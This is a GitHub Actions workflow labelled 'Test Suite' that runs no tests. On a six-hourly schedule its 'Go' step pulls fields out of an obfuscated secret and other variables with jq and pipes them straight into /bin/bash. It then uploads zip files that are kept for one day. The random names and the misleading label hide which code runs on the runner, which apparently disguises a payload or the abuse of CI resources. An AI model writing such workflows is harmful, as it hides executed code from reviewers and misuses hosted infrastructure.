name: Test Suite
on:
  workflow_dispatch:

  schedule:
    - cron: '13 0,6,12,18 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    name: Run task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Go
        env:
          nj028: ${{ secrets.nj028 }}
        run: |
          printf '%s' "$nj028" | jq -r .ixaap97 | /bin/bash
          echo $a66 | jq -r .kibkf347 | /bin/bash
          printf '%s' "$iobqf91" | jq -r .ld19324 | /bin/bash
          printf '%s' "$vx615" | jq -r .wemcm15696 | /bin/bash

      - name: Archive results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 2HI2CW0N
          path: "*.zip"
          retention-days: 1
